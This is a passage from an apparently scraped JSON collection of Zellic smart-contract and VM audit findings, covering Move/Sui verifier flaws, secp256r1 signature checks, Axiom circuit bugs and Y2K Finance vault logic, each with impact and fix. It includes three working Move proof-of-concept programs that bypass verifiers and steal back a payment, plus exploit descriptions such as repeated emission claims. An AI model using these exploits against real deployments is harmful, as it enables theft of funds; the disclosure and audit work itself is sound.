Assessment - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Incorrect control flow graph construction", + "labels": [ + "Zellic" + ], + "body": "Target: Core Move Verifier Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Some verifiers make use of a program analysis technique called abstract interpreta- tion. This technique analyzes the code of the program being verified by following its control flow graph (CFG). The CFG of a function is a directed graph that represents all the possible execution paths of a program. Nodes of the graph represent a basic block, which is a sequence of instructions in which only the last one is a branch, re- turn, or abort. Edges between two nodes mean that there is a possible execution path between the source and the destination node. For efficiency reasons, the successors list of every basic block is precomputed when the CFG is created. The successors list of a basic block is the set of basic blocks that can be directly reached from it. The function that computes the successors of an instruction, file_format.rs:)get_s uccessors, contains an edge case that causes it to incorrectly return an empty list of successors: pub fn get_successors(pc: CodeOffset, code: &[Bytecode]) -> Vec { assert!( /) The program counter must remain within the bounds of the code pc < u16:)MAX &) (pc as usize) < code.len(), \u201dProgram counter out of bounds\u201d ); /) Return early to prevent overflow if pc is hitting the end of max number of instructions allowed (u16:)MAX). if pc > u16:)max_value() - 2 { return vec![]; } /) [function continues...))] If the pc of the instruction is u16:)MAX - 1, the list of successors is empty. Zellic Mysten Labs The incorrect construction of the CFG can lead to a bypass of any verifier that uses the CFG successor list. These currently include the core Move reference safety and locals safety verifiers, as well as the Sui-specific ID leak verifier. Multiple avenues of attack are possible because of this security issue. We constructed proof of concepts that bypass both core verifiers. This vulnerability could likely be exploited to cause extremely significant financial damage. For instance, a common implementation of flash loans gives the borrower an object that does not have the drop ability, which must be given back to the lender contract together with the lent funds and interests in order to correctly finish the trans- action. As shown in the below proof of concepts, the security of the system can be broken by bypassing the locals safety verifier. We note that the Move VM has additional optional security checks (paranoid_type_c hecks) that prevent most exploits. These checks result in a runtime VM error and are not part of the verifier. They seem to be effective at preventing an object without the drop ability from being dropped, but they are insufficient to guard against all possible exploits, as demonstrated in the third proof of concept. Reference safety verifier bypass This proof of concept demonstrates the ability to bypass the reference safety verifier by invoking a hypothetical squash function that takes two mutable Coin references and moves the value of the second coin into the first. The function is instead invoked with two mutable references to the same coin: /)# publish -)syntax=move module 0x1:)balance { struct Balance has drop { value: u64 } public fun create_balance(value: u64): Balance { Balance { value } } public fun squash(balance_1: &mut Balance, balance_2: &mut Balance) { let balance_2_value = balance_2.value; balance_2.value = 0; balance_1.value = balance_1.value + balance_2_value; } Zellic Mysten Labs } /)# run import 0x1.balance; main() { let balance_a: balance.Balance; label padding: jump end; return; /) [PADDING RETURN STATEMENTS] return; label start: balance_a = balance.create_balance(100); balance.squash(&mut balance_a, &mut balance_a); return; label end: jump start; } Locals safety verifier This second proof of concept demonstrates the ability to bypass the locals safety ver- ifier by dropping a value that does not have the drop ability. Two instances of an object are obtained and stored in a local variable. The first instance is overwritten with the second (which would normally not be possible), and the second instance is then de- stroyed using an intended function. We note that dropping an object of which only one instance exists should also be possible in a similar fashion, for example by wrap- ping it into a vector and overwriting it with an empty vector of the same type. /)# publish -)syntax=move module 0x1:)test { struct HotPotato { value: u32 } public fun get_hot_potato(): HotPotato { HotPotato { value: 42 } } Zellic Mysten Labs public fun destroy_hot_potato(potato: HotPotato) { HotPotato { value: _ } = potato; } } /)# run import 0x1.test; main() { let hot_potato_1: test.HotPotato; let hot_potato_2: test.HotPotato; label padding: jump end; return; /) [LOTS OF RETURNS] return; label start: hot_potato_1 = test.get_hot_potato(); hot_potato_2 = test.get_hot_potato(); hot_potato_1 = move(hot_potato_2); test.destroy_hot_potato(move(hot_potato_1)); return; label end: jump start; } Paranoid type checks bypass This following proof of concept demonstrates how it is possible to push a mutable reference to an object and the object itself to the virtual machine stack. This allows to pass the object to some other function while retaining a mutable reference to it. This proof of concept simulates a payment by invoking a function that takes a Balance object and then steals back the transferred value by using the mutable reference. The most straightforward way to obtain a reference in Move would be to store the object in a local variable and then to take a reference to it. Using this method to push both a mutable reference and the instance of the target object on the stack is not feasible due to runtime checks independent from the verifier and from the separate paranoid_type_checks. Execution of the MoveLoc instruction to move the local variable Zellic Mysten Labs to the stack will cause an error in values_impl.rs:)swap_loc; the function checks that the reference count of the object being moved is at most one. Since taking a mutable reference increases the reference count, it not possible to move a local variable for which a reference exists. This proof of concept shows one of the possible bypasses to this limitation. The bro- ken state is achieved by packing the victim object in a vector, taking a reference to the object, and then pushing the object to the stack by unpacking the vector. This strat- egy allows to get a mutable reference to the object without it being stored directly in a local variable, bypassing the check. /)# publish -)syntax=move module 0x1:)test { struct Balance has drop { value: u64 } public fun balance_create(value: u64): Balance { Balance { value } } public fun balance_value(balance: &Balance): u64 { balance.value } public fun pay_debt(balance: Balance) { assert!(balance.value >) 100, 234); /) Here we are dropping the balance /) In reality it would be transferred, the payment marked as done, etc } public fun balance_split(self: &mut Balance, value: u64): Balance { assert!(self.value >) value, 123); self.value = self.value - value; Balance { value } } } /)# run import 0x1.test; Zellic Mysten Labs main() { let v: vector; let bal: test.Balance; label padding: jump end; return; /) [padding returns] return; label start: bal = test.balance_create(100); v = vec_pack_1(move(bal)); /) Stack at this point: /) Pushes a mutable reference to the balance on the stack vec_mut_borrow(&mut v, 0); /) Stack at this point: &mut balance /) Pushes the balance instance by unpacking the vector vec_unpack_1(move(v)); /) Stack at this point: &mut balance, balance /) Pay something (implicitly using the balance on top of the stack as argument) test.pay_debt(); /) Stack at this point: &mut balance /) We still have the mutable reference to the balance, let's steal from it (100); bal = test.balance_split(); /) Stack at this point: /) Push 100 on the stack assert(test.balance_value(&bal) =) 100, 567); return; label end: Zellic Mysten Labs jump start; } Remove the edge case from the function, turning it into an assertion as a hardening measure. Additionally, we suggest to use checked math operations as an additional safety precaution. This edge case was likely implemented to make sure that regular instructions and con- ditional branches (which can fall through to the next offset) do not cause an overflow in the program counter. However, by the point the CFG is computed in the verifier, the control flow verifier has already established that the last instruction in a function is an unconditional branch. Since functions can have at most 65,536 instructions, this means that the instruction at offset u16:)MAX must be an unconditional branch. There- fore its pc+1 (which would overflow) will never be a successor. This issue has been acknowledged by Mysten Labs, and a fix was implemented in commit d2bf6a3c. The issue affected multiple third party users of the Move codebase; therefore, d2b f6a3c fixes the issue covertly and was released as part of a coordinated disclosure effort. Zellic Mysten Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Move and Sui Security Assessment - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Inefficient handling of VecPack and VecUnpack instructions", + "labels": [ + "Zellic" + ], + "body": "Target: Type Safety and Reference Safety Verifiers Category: Coding Mistakes Likelihood: Medium Severity: Medium : Informational The type safety and reference safety verifiers maintain a stack that is used to model the effects the code being verified would have on the real Move VM stack. We observed a potentially exploitable inefficiency in the code that processes VecPack and VecUnpack. These instructions allow to pack and unpack a fixed number of ele- ments from a vector. The VecPack removes the specified number of elements from the operand stack and inserts them in a new vector, while VecUnpack does the opposite. The two verifiers execute a number of operations that equals the number of elements that would be packed or unpacked by these instructions. This can be seen in this excerpt of code from type_safety.rs:)verify_instr Bytecode:)VecPack(idx, num) => { let element_type = &verifier.resolver.signature_at(*idx).0[0]; for _ in 0.)*num { let operand_type = safe_unwrap!(verifier.stack.pop()); if element_type !) &operand_type { return Err(verifier.error(StatusCode:)TYPE_MISMATCH, offset)); } } verifier .stack .push(ST:)Vector(Box:)new(element_type.clone()))); } /) ...)) Bytecode:)VecUnpack(idx, num) => { let operand_vec = safe_unwrap!(verifier.stack.pop()); let declared_element_type = &verifier.resolver.signature_at(*idx).0[0]; if operand_vec !) ST:)Vector(Box:)new(declared_element_type.clone())) { } return Err(verifier.error(StatusCode:)TYPE_MISMATCH, offset)); Zellic Mysten Labs for _ in 0.)*num { verifier.stack.push(declared_element_type.clone()); } } as well as this excerpt from reference_safety/mod.rs:)execute_inner: Bytecode:)VecUnpack(idx, num) => { safe_assert!(safe_unwrap!(verifier.stack.pop()).is_value()); let element_type = vec_element_type(verifier, *idx)?; for _ in 0.)*num { verifier.stack.push(state.value_for(&element_type)); } } /) ...)) Bytecode:)VecUnpack(idx, num) => { safe_assert!(safe_unwrap!(verifier.stack.pop()).is_value()); let element_type = vec_element_type(verifier, *idx)?; for _ in 0.)*num { verifier.stack.push(state.value_for(&element_type)); } } This inefficient implementation could allow to perform a DOS attack on the verifier by submitting a program with an instruction that performs a VecPack or VecUnpack instruction on a very large number of elements. The attack is made harder in practice by constraints imposed by previous verifiers that limit the number of elements that can effectively be used in these instructions. First, the maximum number of elements is limited to 2^16 by the instruction consis- tency verifier. Second, the stack usage verifier enforces a configurable limit on the maximum stack height increase in a single basic block, which is currently set to 1,024. This directly implies that a single VecUnpack instruction cannot operate on more than 1,024 elements. Due to the requirement that the stack height is balanced between a basic block entry and exit, it indirectly implies that VecPack also cannot operate on more than 1,024 elements, since the elements would have to be pushed on the stack by other operations that are also subject to the same limitation. Additionally, the de- Zellic Mysten Labs fault configuration for the Sui protocol limits a module to have a maximum of 1,000 function definitions, and each function to have at most 1,024 basic blocks. Despite these constraints, we do believe a slightly more sophisticated attack could be possible. It is possible to create a module with a large number of functions each containing numerous basic blocks that exploit this inefficiency to the maximum ex- tent. The module could also declare other similar malicious modules as dependencies, which would stress the verifier further, since dependencies are also verified when they are loaded. A stopgap remediation, also suggested by Mysten Labs engineers, would be to further limit the number of elements allowed in VecPack/VecUnpack instructions. However, determining if a maximum safe number exists and quantifying it is not trivial. Implementing a more efficient method for maintaining the verifier stack seems to be Instead of storing only a single type per element, the verifier stack could possible. store a tuple consisting of (type, num_elements) that could more efficiently represent repeated elements of the same type, both in terms of space and time. This issue has been acknowledged by Mysten Labs, and a fix was implemented in commit 19ba60e7. Zellic Mysten Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Move and Sui Security Assessment - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Valid signatures with large value for r are rejected", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1 Category: Coding Mistakes Likelihood: Low Severity: High : Medium The VerifyWithPrecompute function handles verification of ECDSA signatures. Signa- tures consist of a pair (r, s) of integers 0 < r, s < n, where n is the order of the elliptic curve secp256r1. The signature is ultimately accepted if and only if the x-coordinate x of a computed point on the elliptic curve satisfies x =) r, as can be seen in the code snippet below. (x, y) = ShamirMultJacobian(points, u1, u2); return (x =) r); However, the elliptic curve secp256r1 is defined over the finite field Fp, so the x- coordinate x will be an element of Fp and be represented by an integer satisfying 0 \u2264 x < p. Specifications[2] state that a signature should be accepted if x % n =) r. As n < p, it can happen that x % n =) r but x !) r, so some signatures that should be accepted are not. That a properly generated valid signature will hit this bug by accident is extremly un- likely (it will happen roughly once every 10^39 signatures). The Project Wycheproof test vector shows, however, that it is possible to generate such signatures on pur- pose. The impact on the security of projects making use of the Secp256r1 library for signature verification is highly dependent on how signatures are otherwise used. See section 4.1 for a discussion of this as well as the reason for our severity rating. This bug is the root cause of the failure of test case ID 285: k*G has a large x-coo rdinate from Project Wycheproof. Replace return (x =) r); by return ((x % nn) =) r);. 2 See, for example, section 6.4.2 of https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf. Zellic Biconomy Labs This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 983b699d. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Secp256r1 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Validity of public keys is not checked", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1 Category: Coding Mistakes Likelihood: Low Severity: High : Medium The Verify function does not check the validity of the public key passKey. To be valid, a public key needs to [3] 1. not be the point at infinity, 2. have coordinates (x, y) satisfying 0 \u2264 x, y < p, and 3. satisfy the equation y2 = x3 + ax + b modulo p. The public key is only used after conversion to Jacobian coordinates in _preComputeJa cobianPoints with JPoint(passKey.pubKeyX, passKey.pubKeyY, 1), which is never the point at infinity. The _affineFromJacobian function uses the convention that (0,0) in affine coordinates represents the point at infinity. So for this special case, conversion as JPoint(passKey.pubKeyX, passKey.pubKeyY, 1) would be incorrect. But given that the point at infinity is not a valid public key anyway, this is not an issue if instead the public key (0,0) is rejected by recognizing that (0,0) does not lie on the curve. As x and y coordinates of passKey always get reduced modulo p in calculations, the missing check for property 2 means that Verify will in effect check the signature for the public key with coordinates (x % p, y % p). This means that for some public keys (x,y), where x < 2256 \u2212 p or y < 2256 \u2212 p, there exists another pair (x', y') \u2014 for example, (x+p, y) \u2014 that can be used as a public key and for which signatures made for (x,y) would also verify. Finally, if the public key passed to Verify does not lie on the curve, then results re- turned by Verify do not have a meaningful interpretation. Whether the possibility an attacker could generate two different keys for which the same signature is valid is a problem depends on how the caller uses public keys and signature verification. 3 See for example the recommendation in NIST SP 800-186, Appendix D.1.1. Zellic Biconomy Labs This bug allows an attacker to generate public keys together with signatures that will be rejected by verification algorithms that validate the public key but will be accepted by Verify. The impact on the security of projects making use of the Secp256r1 library for signature verification is highly dependent on how signatures are otherwise used. See section 4.1 for a discussion of this as well as the reason for our severity rating. Ensure that (passKey.pubKeyX, passKey.pubKeyY) is a valid public key for the secp256r1 curve. One option is to check this in the Verify function. If this is instead ensured by callers to Verify, then one could alternatively document that Verify as- sumes validity of the public key and that the caller must ensure this. This issue has been acknowledged by Biconomy Labs, and fixes were implemented in the following commits: f7e03db2 55d6e09c Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Secp256r1 - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Invalid Jacobian coordinates used for the point at infinity", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1 Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The functions ShamirMultJacobian and _preComputeJacobianPoints use (0, 0, 0) with the intention to represent the point at infinity in Jacobian coordinates. However, this is not a valid point in Jacobian coordinates. The point at infinity is represented in Jacobian coordinates with (c^2, c^3, 0), with 0 < c < p and exponentiation done modulo p [4]. As _affineFromJacobian and _jAdd check for an argument being the point at infinity by only comparing the last component with 0, they work as intended anyway. The function _modifiedJacobianDouble will return (0,0,0) if passed (0,0,0). Results are thus currently correct if (0, 0, 0) is treated as an alias for the point at infinity. Consider changing (0,0,0) to (1,1,0) in the two places; or, if it is preferred to keep (0, 0,0) as an efficiency trick to save gas, document that this is intentional and that func- tions such as _jAdd, _modifiedJacobianDouble, and _affineFromJacobian must treat (0,0,0) as the point at infinity. In the latter case, we recommend adding test cases for this as well. This issue has been acknowledged by Biconomy Labs, and fixes were implemented in the following commits: f7e03db2 55d6e09c 43525074 4 p refers to the prime over which the elliptic curve is defined. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Secp256r1 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The verify_field_hash function has incorrect Merkle proof\u2013 verification logic", + "labels": [ + "Zellic" + ], + "body": "Target: src/ssz/mod.rs Category: Coding Mistakes Likelihood: High Severity: High : High The verify_field_hash function, which aims to verify the value of a field at a certain position from an SSZ structure, takes an SSZ inclusion proof along with the maximum number of fields and the field index, then shows that the claimed value is included at the specified index. The index can be proved by matching its bit representation with the direction values provided in the Merkle proof. However, the given code matches the direction values with the byte representation of the index, instead of the bit representation. This is shown below. pub fn verify_field_hash( &self, ctx: &mut Context, field_num: AssignedValue, max_fields: usize, proof: SSZInputAssigned, ) -> SSZInclusionWitness { assert!(max_fields > 0); let log_max_fields = log2(max_fields); self.range().check_less_than_safe(ctx, field_num, max_fields as u64); let field_num_bytes = uint_to_bytes_be(ctx, self.range(), &field_num, log_max_fields as usize); /) byte representation let witness = self.verify_inclusion_proof(ctx, proof); let bad_depth = self.range().is_less_than_safe(ctx, witness.depth, log_max_fields as u64); self.gate().assert_is_const(ctx, &bad_depth, &F:)from(0)); Zellic Axiom for i in 1.)(log_max_fields + 1) { let index = self.gate().sub(ctx, witness.depth, Constant(F:)from(i as u64))); let dir_bit = self.gate().select_from_idx(ctx, witness.directions.clone(), index); ctx.constrain_equal(&dir_bit, field_num_bytes[(log_max_fields - i) as usize].as_ref()); } witness } As the directions are constrained to be boolean in the verify_inclusion_proof, any field_num value that has nonboolean value in the byte representation cannot be used in the verify_field_hash function. This implies that the circuit does not satisfy com- pleteness. We recommend using the bit representation to compare with the direction values. This issue has been acknowledged by Axiom, and a fix was implemented in commit 6e2f7454. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Insufficient maximum depth for the MPT proofs leads to a potential DOS attack", + "labels": [ + "Zellic" + ], + "body": "Target: src/storage/mod.rs Category: Coding Mistakes Likelihood: High Severity: High : High As seen in the src/storage/mod.rs code, the maximum depth for the account proof is set to 10. This value is sent over to the MPT circuits as the max_depth value. pub const ACCOUNT_PROOF_MAX_DEPTH: usize = 10; pub const STORAGE_PROOF_MAX_DEPTH: usize = 9; However, given a target address, it is feasible to compute private keys corresponding to addresses that make the MPT inclusion proof for the target address have depth larger than 10. For example, simply working with the first 11 hex values, one can run a parallelizable O(2^44) attack to find the relevant private keys. All storage proofs or account proofs relevant to the targeted address will fail, leading to a denial-of-service\u2013like impact. We recommend increasing the maximum depth of the account proofs and storage proofs accordingly. Axiom acknowledged this finding and provided the below response. 1. We have moved these constants to axiom-query in the second audit: axiom-query 2. In a subsequent PR, we added max_trie_depth to core_params for Account, Storage, Transaction, and Receipt subquery circuits, so they are accurately recorded as circuit configuration parameters. Zellic Axiom In production, we will use the following max_trie_depth\u2019s: Account(state) trie: 14 Storage trie: 13 Transaction trie: 6 Receipt trie: 6 For account and storage, these max depths were determined by running an anal- ysis on a Geth full node: https://hackmd.io/@axiom/BJBledudT. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Function new_from_bytes in src/ssz/types.rs is incorrect", + "labels": [ + "Zellic" + ], + "body": "Target: src/ssz/types.rs Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The new_from_bytes function in SszBasicTypeList takes a vector of AssignedBytes< F> and the len to create a new SszBasicTypeList. To do so, it computes the pre_len array, which represents whether or not the current index is less than the len value. The point of computing this array, as shown in other functions such as new_mask, is that the value can be multiplied by the pre_len array to force all values at index no less than len to be equal to zero. This is shown in the code below. pub fn new_mask( ctx: &mut Context, range: &RangeChip, values: Vec), int_bit_size: usize, len: AssignedValue, ) -> Self { /) ...)) for j in 0.)values.len() { let mut new_bytes = Vec:)new(); for i in 0.)int_byte_size { let val = range.gate().mul(ctx, values[j].value()[i], pre_len[j]); new_bytes.push(val); } let new_basic = SszBasicType:)new(ctx, range, new_bytes, int_bit_size); new_list.push(new_basic); } /) ...)) } Here, we see that all bytes in the values[j].value() are multiplied with pre_len[j] correctly. However, in the new_from_bytes function, this is handled incorrectly. Zellic Axiom pub fn new_from_bytes( ctx: &mut Context, range: &RangeChip, vals: Vec), int_bit_size: usize, len: AssignedValue, ) -> Self { /) ...)) for value in vals { let mut new_value = Vec:)new(); for i in 0.)32 { let new_val = range.gate.mul(ctx, value[i], pre_len[i]); new_value.push(new_val); } let basic_type = SszBasicType:)new(ctx, range, new_value, int_bit_size); values.push(basic_type); } /) ...)) } Here, we see that value[i], which is the ith byte of a single AssignedBytes instance, is multiplied with the pre_len[i], which is incorrect. We also note that the pre_len array is initialized with the length values.len(), which is zero. pub fn new_from_bytes( ctx: &mut Context, range: &RangeChip, vals: Vec), int_bit_size: usize, len: AssignedValue, ) -> Self { /) ...)) let mut values = Vec:)new(); /) safety constraints? let len_minus_one = range.gate.dec(ctx, len); let len_minus_one_indicator = range.gate.idx_to_indicator(ctx, len_minus_one, vals.len()); let zero = ctx.load_zero(); Zellic Axiom let mut pre_len = vec![zero; values.len()]; /) ...)) } To the best of our knowledge, this function is not used anywhere. We recommend removing the new_from_bytes function. This issue has been acknowledged by Axiom, and a fix was implemented in commit 54dabf29. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The node type of terminal node in MPT is not range checked to be a bit", + "labels": [ + "Zellic" + ], + "body": "Target: src/mpt/mod.rs Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium All inputs to the MPT inclusion/exclusion proof circuit are range checked in parse_mp t_inclusion_phase0 to ensure there is no undefined behavior in functions that expect input witness values to be bytes or boolean values. The node_type for every node in proof is range checked to be a single bit; however, this check is missed for proof.lea f.node_type. for bit in iter:)once(&proof.slot_is_empty) .chain(proof.nodes.iter().map(|node| &node.node_type)) .chain(proof.key_frag.iter().map(|frag| &frag.is_odd)) { } self.gate().assert_bit(ctx, *bit); This missing range check can lead to undefined behavior as proof.leaf.node_type is passed into functions that assume the corresponding argument to be boolean, such as in parse_terminal_node_phase0. self.gate().select(ctx, node_byte, dummy_ext_byte, leaf_bytes.node_type) self.gate().select(ctx, dummy_branch_byte, node_byte, leaf_bytes.node_type) Assert proof.leaf.node_type to be boolean. for bit in iter:)once(&proof.slot_is_empty) .chain(proof.nodes.iter().map(|node| &node.node_type)) .chain(proof.key_frag.iter().map(|frag| &frag.is_odd)) Zellic Axiom .chain(vec![proof.leaf.node_type]) self.gate().assert_bit(ctx, *bit); { } This issue has been acknowledged by Axiom, and a fix was implemented in commit 3ff70a54. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.5 No leading zero check in rlp(idx) leads to soundness bug in transaction circuit", + "labels": [ + "Zellic" + ], + "body": "Target: src/transaction/mod.rs Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The transaction trie maps rlp(transaction_index) to the rlp(transaction) or TxType | rlp(transaction), depending on whether the transaction is a legacy transaction or not. One of the goals of the transaction circuit is to validate whether transaction_ind ex exists in the trie or not. To do so, the circuit validates that the key_bytes of the MPTProof structure is equal to the RLP-encoded transaction_index. This is done as follows \u2014 first, the key_byt es is RLP decoded. Then, the decoded bytes are evaluated as an integer. Then, the evaluated value is constrained to be equal to the transaction_index. pub fn parse_transaction_proof_phase0( &self, ctx: &mut Context, input: EthTransactionInputAssigned, ) -> EthTransactionWitness { /) ...)) /) check key is rlp(idx): /) given rlp(idx), parse idx as var len bytes let idx_witness = self.rlp().decompose_rlp_field_phase0( ctx, proof.key_bytes.clone(), TRANSACTION_IDX_MAX_LEN, ); /) evaluate idx to number let tx_idx = evaluate_byte_array(ctx, self.gate(), &idx_witness.field_cells, idx_witness.field_len); /) check idx equals provided transaction_index from input ctx.constrain_equal(&tx_idx, &transaction_index); /) ...)) } Zellic Axiom Here, the TRANSACTION_IDX_MAX_LEN is set to 2. This may cause an issue, as there is no check that the RLP-decoded bytes have no leading zeros. In the case where transac tion_index = 4, the actual transaction is stored in the key rlp(0x04). However, one can set the key_bytes as rlp(0x0004) and it would still satisfy all the constraints. The issue is that there would not be any value corresponding to the key rlp(0x0004 ), so even when there is actually a transaction with index 4, it would be possible to prove that there is no such a transaction. A similar issue is also present in the receipt circuit. This can be used create a fake proof that a block has an incorrect number of transac- tions. Suppose that there are actually 20 transactions in a block. One can prove that a transaction with index 4 exists in the block as usual, then prove that a transaction with index 5 does not exist in the block using the vulnerability we describe above. This is sufficient to prove that there are only five transactions in the block. We recommend adding a padding check to the RLP decomposition. This issue has been acknowledged by Axiom, and a fix was implemented in commit f3b1130e. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Emissions can be claimed multiple times", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Business Logic Likelihood: High Severity: Critical : Critical The function claimEmissions can be used by users to claim Y2K emissions. This func- tion uses the correct vault balance of users to calculate the accumulated emissions and then subtracts the emission debt to find out the amount of emission tokens to be transferred to the users. function claimEmissions(address receiver) external returns (uint256 emissions) { } int256 accEmissions = int256( (balanceOf[msg.sender] * accEmissionPerShare) / PRECISION ); emissions = uint256(accEmissions - userEmissionDebt[msg.sender]); userEmissionDebt[msg.sender] = accEmissions; if (emissions > 0) emissionToken.safeTransfer(receiver, emissions); emit EmissionsClaimed(msg.sender, receiver, emissions); A user can also transfer their vault tokens to another account after calling claimEmis sions. As the emission debt is not transferred along with the vault balance, they can call claimEmissions again using their other account and claim these emissions again. This process can be repeated multiple times, effectively draining all the emission to- kens from the StrategyVault contract. All the emission tokens can be drained out of the contract. Zellic Y2K Finance While transferring tokens using the functions transfer and transferFrom, it is impor- tant to update the userEmissionDebt mapping using the function _updateUserEmissio ns. To do this, override the _transfer function, which is called in both transfer and tran sferFrom functions, to add the following additional logic. function _transfer(address sender, address recipient, uint256 amount) internal virtual override { _updateUserEmissions(sender,amount,false); _updateUserEmissions(recipient,amount,true); super._transfer(sender, recipient, amount); } The issue was fixed in commit dd5470d and 7a57688. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The value of queuedWithdrawalTvl can be artificially inflated", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Business Logic Likelihood: High Severity: High : High The value of queuedWithdrawalTvl can be artificially inflated, which might revert the transactions calling fetchDeployAmounts or deployPosition in StrategyVault and _borr ow in the HookAaveFixYield and HookAave contracts. When a user calls requestWithdrawal, the value of totalQueuedShares[deployId] is increased by the amount of shares. The user can then transfer their funds to another wallet and call requestWithdrawal again, which would increase the totalQueuedShare s[deployId] for the second time. This can be repeated multiple times to artificially increase the value of totalQueuedSh ares[deployId]. When the owner closes this position using closePosition, this value will be added to queuedWithdrawalTvl, thus increasing its value more than intended. If the value of queuedWithdrawalTvl becomes greater than totalAssets() after a suc- cessful exploit, it will revert the function call fetchDeployAmounts and deployPosition in the StrategyVault contract due to integer underflow. This would also revert any call to availableUnderlying, which is called in _borrow in the hook contract. Certain function calls would revert, and new positions cannot be deployed. When a user requests withdrawal using the requestWithdrawal, these funds should not be allowed to be transferred to other wallets. An additional check can be implemented in the _transfer function that checks that no more than balanceOf[sender] - withdrawQueue[sender].shares are transferred from the sender\u2019s address. function _transfer(address sender, address recipient, uint256 amount) internal virtual override { require(balanceOf[sender] - withdrawQueue[sender].shares > amount,\u201dNot enough funds\u201d); Zellic Y2K Finance _updateUserEmissions(sender,amount,false); _updateUserEmissions(recipient,amount,true); super._transfer(sender, recipient, amount); } The issue was fixed in commit 11f6797. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 The lack of token addresses\u2019 verification", + "labels": [ + "Zellic" + ], + "body": "Target: zapFrom Category: Coding Mistakes Likelihood: Low Severity: High : High The permitSwapAndBridge and swapAndBridge functions allow users to perform the swap, and after that, bridge the resulting tokens to another chain using Stargate, which is a decentralised bridge and exchange building on top of the Layer Zero protocol. These functions have the following parameters: swapPayload, receivedToken, and _s rcPoolId. The swapPayload parameter contains all the necessary data for the swap, including the path array with the list of tokens involved in the swap process. It is assumed that the final address of the token participating in the swap will be used for cross-chain swap. The receivedToken token address will be used by the _bridge function for assigning the approval for the stargateRouter contract. Besides that, the user controls the _srcPoolId parameter, which determines the pool address, which is associated with a specific token and will hold the assets of the tokens that will be transferred from the current contact inside stargateRouter. However, there is no verification that these three addresses \u2013 receivedToken, the last address in path and pool.token() \u2013 match each other. When using native tokens, the user should pass the wethAddress address as received Token because before _bridge, the necessary amount of tokens should be withdrawn from the weth contract. After that, the receivedToken will be rewritten to zero address. Currently there is no verification that the receivedToken is not zero initially. function swapAndBridge( uint amountIn, address fromToken, address receivedToken, uint16 srcPoolId, uint16 dstPoolId, bytes1 dexId, bytes calldata swapPayload, bytes calldata bridgePayload ) external payable { _checkConditions(amountIn); Zellic Y2K Finance ERC20(fromToken).safeTransferFrom(msg.sender, address(this), amountIn); uint256 receivedAmount; if (dexId !) 0x05) { receivedAmount = _swap(dexId, amountIn, swapPayload); } else { ERC20(fromToken).safeApprove(balancerVault, amountIn); receivedAmount = _swapBalancer(swapPayload); } if (receivedToken =) wethAddress) { WETH(wethAddress).withdraw(receivedAmount); receivedToken = address(0); } _bridge( receivedAmount, receivedToken, srcPoolId, dstPoolId, bridgePayload ); } function _bridge( uint amountIn, address fromToken, uint16 srcPoolId, uint16 dstPoolId, bytes calldata payload ) private { if (fromToken =) address(0)) { /) NOTE: If sending after swap to ETH then msg.value will be < amountIn as it only contains the fee If sending without swap msg.value will be > amountIn as it contains both fee + amountIn **/ uint256 msgValue = msg.value > amountIn ? msg.value : amountIn + msg.value; Zellic Y2K Finance IStargateRouter(stargateRouterEth).swapETHAndCall{value: msgValue}(...))); ...)) } ...)) } Due to the lack of verification that the receivedToken address matches the last ad- dress in the path array and pool.token() address, users are able to employ any token address as the receivedToken. This potentially allows them to successfully execute cross-chain swaps using tokens owned by the contract. In instances where a user initially sets the receivedToken address to the zero address, the required amount of tokens will not be withdrawn from the weth contract. Conse- quently, the contract will attempt to transfer to the stargateRouter contract the funds present in its balance before the transaction took place. In both scenarios, if the contract possesses any tokens, they can be utilized instead of the tokens received during the execution of the swap. This also leads to a problem in the _bridge function during msgValue calculation. When the fromToken (receivedToken from swapAndBridge) is not the outcome of a swap, users can specify any amountIn as the result of a swap involving a different token. This am ountIn value will then be used as the ETH value. Consequently, if the contract holds other funds, they will be sent to stargateRouterEth along with the user\u2019s fee. We recommend to add the check that the receivedToken and the last address in path and pool.token() match each other \u2014 and also that the receivedToken address is not equal to zero address. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 5f79149. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The lack of verification of the payload data", + "labels": [ + "Zellic" + ], + "body": "Target: zapFrom Category: Coding Mistakes Likelihood: High Severity: High : High Within the functions bridge, permitSwapAndBridge, and 